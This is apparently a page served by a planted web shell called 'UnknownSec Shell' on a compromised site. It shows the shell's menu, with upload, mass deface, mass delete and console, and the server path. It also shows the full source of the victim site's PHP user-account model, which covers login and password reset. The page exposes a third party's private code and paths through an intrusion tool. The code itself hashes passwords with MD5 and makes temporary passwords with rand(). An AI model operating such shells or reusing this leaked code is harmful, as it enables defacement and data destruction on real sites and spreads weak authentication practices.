shell bypass 403
UnknownSec Shell
:
/
home
/
delvin
/
public_html
/
dev2.delv-in.com
/
models
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
m_users.php
<?php class Users { private $Database; private $db_table = 'users'; function __construct(){ global $Database; $this->Database = $Database; } public function get($userID, $username, $email){ $data = array(); $Template = new Template; if ($userID > 0){ // get 1 user account if ($stmt = $this->Database->prepare("SELECT * FROM " . $this->db_table . " WHERE userID =?")){ $stmt->bind_param('i', $userID); $stmt->execute(); $stmt->store_result(); $stmt->bind_result($userID, $fName, $lName, $email, $username, $encryptPass); if ($stmt->num_rows() > 0){ $stmt->fetch(); $data = array('userID'=>$userID, 'fName'=>$fName, 'lName'=>$lName, 'email'=>$email, 'username'=>$username, 'encryptPass'=>$encryptPass); return $data; $stmt->close(); } } else { $Template->set_alert("Query error: ".__line__." m_users"); } } else if ($username != '' && $email != ''){ // get for password reset if ($stmt = $this->Database->prepare("SELECT * FROM " . $this->db_table . " WHERE username=? and email=?")){ $stmt->bind_param('ss', $username, $email); $stmt->execute(); $stmt->store_result(); $stmt->bind_result($userID, $fName, $lName, $email, $username, $encryptPass); if ($stmt->num_rows() > 0){ $stmt->fetch(); $data = array('userID'=>$userID, 'fName'=>$fName, 'lName'=>$lName, 'email'=>$email, 'username'=>$username, 'encryptPass'=>$encryptPass); return $data; $stmt->close(); } } else { $Template->set_alert("Query error: ".__line__." m_users"); } } else { // get all user accounts if ($stmt = $this->Database->prepare("SELECT * FROM " . $this->db_table . " ORDER BY lName")){ $stmt->execute(); $stmt->store_result(); $stmt->bind_result($userID, $fName, $lName, $email, $username, $encryptPass); while ($stmt->fetch()){ $data[$userID] = array('userID'=>$userID, 'fName'=>$fName, 'lName'=>$lName, 'email'=>$email, 'username'=>$username, 'encryptPass'=>$encryptPass); } return $data; $stmt->close(); } else { $Template->set_alert("Query error: ".__line__." m_users"); } } } public function add_mod($userID, $fName, $lName, $email, $username, $pass){ $Template = new Template; $fName = htmlentities($fName, ENT_QUOTES); $lName = htmlentities($lName, ENT_QUOTES); if ($userID <= 0){ // add new user account $encryptPass = $this->make_temp_pass(); date_default_timezone_set("Canada/Pacific"); $userID = strtotime('now'); $search_arr = array("'", " "); $replace_arr = array("", ""); $username = str_replace($search_arr, $replace_arr, strtolower(substr($fName,0,6)."." . substr($lName,0,6))); if ($stmt = $this->Database->prepare("INSERT INTO " . $this->db_table . " (userID, fName, lName, email, username, encryptPass) VALUES (?,?,?,?,?,?)")){ $stmt->bind_param('isssss', $userID, $fName, $lName, $email, $username, $encryptPass); if ($stmt->execute()){ $Template->set_alert('User account added', 'success'); $subject = "DELVIN Public Site Account Created for You."; $message = "<p>Dear ".$fName.",</p> <p>An account has been created for you at www.delv-in.com for the purpose of managing the contents of the sales site (i.e. blog and testimonials).</p> <p>Your username is <b>".$username."</b>. Please go to <a href='http://www.delv-in.com/cms_login.php'>http://www.delv-in.com/cms_login.php</a> and click the <b><i>Lost Password</i></b> button to have a password created and emailed to you. You will be required to enter your username and email address. </p>"; $Send_Email = new Send_Email($email, $subject, $message); } else { $Template->set_alert('ERROR: User account was not added', 'error'); } } } else { // update existing account if ($pass != ''){ // update password $encryptPass = md5($pass . P_SALT); if ($stmt = $this->Database->prepare("UPDATE ". $this->db_table . " SET fName=?, lName=?, email=?, username=?, encryptPass=? WHERE userID=?")){ $stmt->bind_param('sssssi', $fName, $lName, $email, $username, $encryptPass, $userID); if ($stmt->execute()){ $Template->set_alert('User account updated - Password changed', 'success'); } else { $Template->set_alert('ERROR: User account was not updated', 'error'); } } } else { if ($stmt = $this->Database->prepare("UPDATE ". $this->db_table . " SET fName=?, lName=?, email=?, username=? WHERE userID=?")){ $stmt->bind_param('ssssi', $fName, $lName, $email, $username, $userID); if ($stmt->execute()){ $Template->set_alert('User account updated - Password unchanged', 'success'); } else { $Template->set_alert('ERROR: User account was not updated', 'error'); } } } } } public function delete($userID){ $Template = new Template; if ($stmt = $this->Database->prepare("DELETE FROM " . $this->db_table . " WHERE userID = ?")){ $stmt->bind_param('i', $userID); if ($stmt->execute()){ $Template->set_alert('User account deleted', 'success'); } else { $Template->set_alert('ERROR: User account was not deleted', 'error'); } } } public function validate_login($uname, $pass){ $encryptPass = MD5($pass . P_SALT); $Template = new Template; $query1 = "SELECT * FROM " . $this->db_table . " WHERE username = '".$uname."' and encryptPass = '".$encryptPass."'"; $query = "SELECT * FROM " . $this->db_table . " WHERE username = ? and encryptPass = ?"; // echo __line__.": ".$query1."<br>"; if ($stmt = $this->Database->prepare($query)){ $stmt->bind_param('ss', $uname, $encryptPass); $stmt->execute(); $stmt->store_result(); $stmt->bind_result($userID, $fName, $lName, $email, $username, $encryptPass); if ($stmt->num_rows() > 0){ $stmt->fetch(); $_SESSION['LID'] = $userID; $_SESSION['username'] = $username; $_SESSION['fName'] = $fName; $_SESSION['lName'] = $lName; $_SESSION['email'] = $email; $Template->set_alert("Login Successful", 'success'); } else { session_destroy(); session_start(); $Template->set_alert("Login Failed", 'error'); } $stmt->close(); } } public function logout(){ $Template = new Template; session_destroy(); session_start(); $_SESSION['LID'] = ''; if ($_SESSION['LID'] > 0){ $Template->set_alert('Logout Failed', 'error'); } else { $Template->set_alert('Logout Successful', 'success'); } } /* * generate a random string of 8 characters for a temporary password; * */ public function make_temp_pass(){ $this->t_pass = ''; $this->characters = '23456789abcdefghijkmnopqrstuvwxyzABCDEFGHIJKLMNPQRSTUVWXYZ!@#$%^&*'; $strlength = strlen($this->characters); for ($i = 0; $i <= 7; $i++) { $randNum = rand(1,$strlength); $this->t_pass .= substr($this->characters, $randNum,1); } // echo __LINE__."-m_reset_pass: ".$this->t_pass.", | ".strlen($this->t_pass)."<br>"; if (strlen($this->t_pass) == 8){ return $this->t_pass; } else { return FALSE; } } public function update_pass($encryptPass, $userID){ if ($stmt = $this->Database->prepare("UPDATE ". $this->db_table . " SET encryptPass=? WHERE userID=?")){ $stmt->bind_param('si', $encryptPass, $userID); if ($stmt->execute()){ return TRUE; } else { return FALSE; } } } public function reset_pass($username, $email){ $Template = new Template; $row = $this->get('', $username, $email); if ($row['userID'] > 0){ // username-email combo is validated $temp_pass = $this->make_temp_pass(); if (strlen($temp_pass) > 6){ // update the user record $encryptPass = md5($temp_pass. P_SALT); if ($this->update_pass($encryptPass, $row['userID'])){ // user account updated, send email $subject = 'DELVIN SALES SITE PASSWORD RESET'; $message = "<p>Dear ".$row['fName'].",</p> <p>A temporary password has been created and saved to your account.</p> <p>Your temporary password is <b>".$temp_pass."</b>.</p> <p>Please log in and update this password to one that is private.</p>"; if ($Send_Email = new Send_Email($row['email'], $subject, $message, '', '')){ $Template->set_alert('Temporary password created and sent to '.$row['email'], 'success'); return true; } else { $Template->set_alert("User account validated<br>Temporary password created<br>Temporary pass was saved to user account<br>ERROR: could not send email", "error"); return false; } } else { $Template->set_alert("User account validated<br>Temporary password created<br>ERROR: could not write password to databaset", "error"); return false; } } else { $Template->set_alert("User account validated.<br>ERROR: Temporary password could not be created", "error"); return false; } } else { $Template->set_alert('ERROR: Username/email combo could not be validated', 'error'); return false; } } } ?>
© 2026 UnknownSec